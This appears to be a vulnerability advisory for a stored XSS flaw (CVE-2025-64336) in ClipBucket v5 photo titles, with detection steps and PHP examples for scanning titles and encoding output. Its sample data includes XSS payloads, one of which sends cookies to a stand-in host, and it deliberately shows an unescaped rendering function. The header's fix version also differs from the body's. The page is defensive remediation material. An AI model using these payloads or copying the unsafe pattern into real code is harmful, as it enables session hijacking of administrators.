Platform
php
Component
clipbucket-v5
Fixed in
5.5.3
CVE-2025-64336 describes a stored Cross-Site Scripting (XSS) vulnerability affecting ClipBucket v5, an open-source video sharing platform. This vulnerability allows authenticated regular users to inject malicious code into photo titles, leading to potential JavaScript execution within the administrator's browser. Versions 5.5.2-#146 and earlier are affected, while a fix is available in version 5.5.2-#147.
The vulnerability lies in the Manage Photos feature of ClipBucket. An authenticated regular user can upload a photo whose title contains HTML or JavaScript. The payload is not rendered on the public video gallery or detail pages, but the admin-side Manage Photos view renders the stored title unsafely, so the script runs the next time an administrator opens that view. The attacker thereby gets arbitrary JavaScript execution in the administrator's browser context, which can be used for session hijacking, credential theft or defacement of the administrative interface, and potentially for full control of the ClipBucket installation through the administrator's authenticated session.
The vulnerability was publicly disclosed on 2025-11-07. No public proof-of-concept (PoC) code has been identified at the time of writing, and it is not listed in the CISA KEV catalog. The EPSS score recorded on this page is 0.06% (18th percentile), i.e. a low predicted probability of exploitation, but because a successful attack compromises the administrator account, it warrants prompt attention regardless.
Any ClipBucket v5 deployment that lets untrusted users register and upload photos is exposed; the target is the administrator who reviews those uploads. Community and multi-tenant installations with many registered users are especially at risk, since a single malicious or compromised account is enough to plant a title that fires when an administrator opens Manage Photos.
• php: Examine ClipBucket's database for photo titles containing suspicious HTML or JavaScript. Search a dump of the photos table for patterns such as <script, on...= event handlers or javascript: (the dump path below is an example; adjust it to where your dump is written, or run the equivalent query against the database directly):
grep -iE '<script|on[a-z]+ *=|javascript:' /var/www/clipbucket/db/photos.sql
• generic web: Monitor access logs for requests to the Manage Photos section with unusual parameters or user agents, and look for POST requests to the photo upload endpoint whose title parameter carries HTML tags or event handlers.
• generic web: Check the ClipBucket installation directory for newly created files or modifications to existing files that could indicate an attacker has gained access.
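A grep over a SQL dump misses payloads that were stored entity- or URL-encoded and flags innocent titles that merely contain "<". The script below is an added example, not ClipBucket's own code: it checks the raw, HTML-entity-decoded and URL-decoded form of every title against a small set of markup patterns. The sample rows are constructed inline so it runs offline; the table and column names in the comment (photos, photo_id, userid, photo_title) are assumptions to verify against your schema before replacing the sample with a real query.

```php
<?php
// Added example (not ClipBucket's own code): scan stored photo titles for
// markup that should never appear in a plain-text title.
declare(strict_types=1);

/** Patterns that indicate HTML/JS in a field that should be plain text. */
const SUSPICIOUS_PATTERNS = [
    '/<\s*script/i',
    '/<\s*(iframe|object|embed|svg|img|math)\b/i',
    '/\bon[a-z]+\s*=/i',          // inline event handlers: onload=, onerror=, ...
    '/javascript\s*:/i',
    '/<[a-z!\/]/i',               // any tag start at all (but not "3 < 4")
];

/**
 * Variants of a title that must all be inspected: the raw value, its
 * HTML-entity-decoded form and its URL-decoded form, so a payload stored as
 * &lt;script&gt; or %3Cscript%3E is not missed.
 */
function titleVariants(string $title): array
{
    return array_unique([
        $title,
        html_entity_decode($title, ENT_QUOTES | ENT_HTML5, 'UTF-8'),
        rawurldecode($title),
    ]);
}

/** True if any variant of the title matches a suspicious pattern. */
function isSuspiciousTitle(string $title): bool
{
    foreach (titleVariants($title) as $variant) {
        foreach (SUSPICIOUS_PATTERNS as $pattern) {
            if (preg_match($pattern, $variant) === 1) {
                return true;
            }
        }
    }
    return false;
}

/** Filter a result set down to the rows whose title looks like markup. */
function findSuspiciousTitles(array $rows): array
{
    return array_values(array_filter(
        $rows,
        fn(array $row): bool => isSuspiciousTitle($row['photo_title'])
    ));
}

// Constructed sample rows. In a real check replace this with something like
//   $rows = $pdo->query('SELECT photo_id, userid, photo_title FROM photos')
//               ->fetchAll(PDO::FETCH_ASSOC);
// (table and column names are assumptions; check your schema).
$rows = [
    ['photo_id' => 1, 'userid' => 7,  'photo_title' => 'Sunset over the harbour'],
    ['photo_id' => 2, 'userid' => 7,  'photo_title' => 'Holiday <b>2024</b>'],
    ['photo_id' => 3, 'userid' => 12, 'photo_title' => '<script>fetch("//evil.example/?c="+document.cookie)</script>'],
    ['photo_id' => 4, 'userid' => 12, 'photo_title' => '<img src=x onerror=alert(document.domain)>'],
    ['photo_id' => 5, 'userid' => 13, 'photo_title' => '&lt;svg onload=alert(1)&gt;'],
    ['photo_id' => 6, 'userid' => 14, 'photo_title' => 'Ratio 3 < 4 and 5 > 2'],
];

foreach (findSuspiciousTitles($rows) as $row) {
    printf("photo_id=%d userid=%d title=%s\n", $row['photo_id'], $row['userid'], $row['photo_title']);
}
```

Rows 2 through 5 are reported (the entity-encoded SVG payload in row 5 is caught only because the decoded variant is checked); row 6 is not, because a bare "<" followed by a space is not a tag start. Treat hits as leads for manual review: the event-handler pattern can also match harmless text such as "turn on = 5", and the userid of each hit tells you which account to look at next.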
disclosure
Exploit status
EPSS
0.06% (18th percentile)
CISA SSVC
The primary mitigation for CVE-2025-64336 is to upgrade ClipBucket to version 5.5.2-#147 or later without delay. If upgrading is not immediately feasible, the effective interim fix is to HTML-encode the photo title wherever the admin Manage Photos view outputs it; input validation on the Photo Title field (rejecting or stripping markup) is worthwhile as defence in depth but on its own is the weaker control, since encoding at output is what prevents stored data from being interpreted as HTML. A Web Application Firewall tuned to block XSS payloads can add a temporary layer of protection but is bypassable and does nothing about titles that are already stored, so review existing user-uploaded titles for suspicious content and clean them up as part of the response.
Update ClipBucket to version 5.5.2-#147 or later. This version fixes the stored XSS vulnerability in the photo management function. The update prevents authenticated users from injecting malicious code through photo titles, thereby protecting the administrator's session.
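To make the difference between the two interim controls concrete, the following added example (not ClipBucket's own code) shows the vulnerable pattern of echoing a stored title straight into an admin table row, the same row rendered with output encoding for both the text and the attribute context, and a strict input-side validator. Function names, the edit_photo.php URL and the field names are illustrative assumptions.

```php
<?php
// Added example (not ClipBucket's own code): unsafe vs. encoded rendering of a
// stored photo title in an admin list view, plus input-side validation.
declare(strict_types=1);

/** Vulnerable: the stored title is interpolated into HTML unescaped. */
function renderPhotoRowUnsafe(array $photo): string
{
    return '<tr><td>' . $photo['photo_id'] . '</td>'
         . '<td><a href="edit_photo.php?photo=' . $photo['photo_id'] . '" title="' . $photo['photo_title'] . '">'
         . $photo['photo_title'] . '</a></td></tr>';
}

/**
 * Encode for an HTML text node or a double-quoted attribute value.
 * ENT_QUOTES escapes both quote characters (needed in attribute context);
 * ENT_SUBSTITUTE stops invalid UTF-8 from silently turning the output into ''.
 */
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

/** Hardened: every untrusted value is encoded at the point of output. */
function renderPhotoRowSafe(array $photo): string
{
    $id    = (int) $photo['photo_id'];   // numeric field: cast, do not trust
    $title = h($photo['photo_title']);   // safe in both text and attribute context
    return '<tr><td>' . $id . '</td>'
         . '<td><a href="edit_photo.php?photo=' . $id . '" title="' . $title . '">'
         . $title . '</a></td></tr>';
}

/**
 * Defence in depth on the input side: refuse titles that contain "<" or ">"
 * at all and bound their length before anything reaches the database. This is
 * deliberately stricter than necessary (it also rejects "3 < 4") and does not
 * replace output encoding; it only shrinks what an attacker can store.
 */
function validatePhotoTitle(string $title): ?string
{
    $title = trim($title);
    if ($title === '' || mb_strlen($title, 'UTF-8') > 100) {
        return null;
    }
    if (preg_match('/[<>]/', $title) === 1) {
        return null;
    }
    return $title;
}

// Constructed sample: a title an authenticated user could have stored. The
// leading "> closes the title="..." attribute in the unsafe rendering, so the
// payload works even where the title only ever lands inside an attribute.
$photo = [
    'photo_id'    => 42,
    'photo_title' => '"><img src=x onerror=alert(document.cookie)>',
];

echo "UNSAFE: " . renderPhotoRowUnsafe($photo) . "\n";
echo "SAFE:   " . renderPhotoRowSafe($photo) . "\n";
var_dump(validatePhotoTitle($photo['photo_title']));     // NULL: rejected
var_dump(validatePhotoTitle('Sunset over the harbour')); // string: accepted
```

In the encoded output the title appears as &quot;&gt;&lt;img src=x onerror=alert(document.cookie)&gt; in both places, so the browser shows it as literal text and no event handler is created. Note that h() is only correct for HTML text and quoted attribute values; a title placed inside a JavaScript block or a URL would need the encoding appropriate to that context instead.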
CVE-2025-64336 is a stored Cross-Site Scripting (XSS) vulnerability in ClipBucket v5, allowing authenticated users to inject malicious JavaScript into photo titles, potentially impacting the administrator's browser.
You are affected if you are using ClipBucket v5 versions 5.5.2-#146 or earlier. Upgrade to 5.5.2-#147 to mitigate the risk.
The recommended fix is to upgrade ClipBucket to version 5.5.2-#147 or later. As a temporary workaround, HTML-encode the photo title where the admin Manage Photos view renders it, and add input validation on the Photo Title field as an additional layer.
There is no confirmed active exploitation of CVE-2025-64336 at this time, but the vulnerability is publicly known and should be addressed promptly.
Refer to the ClipBucket security advisory for details and updates: [https://www.clipbucket.net/security/advisories/]